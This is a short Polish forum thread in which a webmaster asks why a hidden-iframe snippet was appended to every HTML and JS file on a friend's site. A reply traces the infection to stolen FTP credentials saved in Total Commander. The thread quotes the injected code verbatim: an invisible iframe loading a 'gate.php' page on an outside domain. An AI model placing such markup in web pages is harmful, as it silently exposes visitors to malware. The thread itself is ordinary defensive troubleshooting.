Doklejony kod do plików - wirus?

Cześć,

właśnie czyściłem stronę koledze - bo mu wykrywało wirusy u ludzi... trojany itp.

okazało się, że do wszysktich plików html i js został doklejony kod:

<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://dfdsfsdfasdf.com/gate.php?f=108333271 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->

i teraz pytanie.. skąd to się tam wzięło ? wyczytałem, że total commander mógł dokleić - macie jakieś sugestie?
co ta ramka robi to już mnie mniej obchodzi bo do tego się nie dojdzie.. ale jak się przed tym bronić ?

Wyczytałem, że to JS/Kryptik.JE, ale już nie powinien się rozprzestrzeniać, bo strona dfdsfsdfasdf.com nie istnieje.

no właśnie kurde zawala wciąż mi serwer...
wszystkie pliki html/js/css sprawdziłem - nie ma go.. a mimo to co chwila na serwerze tworzy się katalog .log i tam wrzuca mi jakieś śmieci do niego...
co można jeszcze zrobić?

może on się dodać do flashowych plików ?

do flasha się nic nie doda. zmień hasło do ftp. przestań używać total commandera, albo chociaż nie zaznaczaj "zapamiętaj hasło" tylko wklepuj zawsze sam. przede wszystkim to wyczyścić komputer.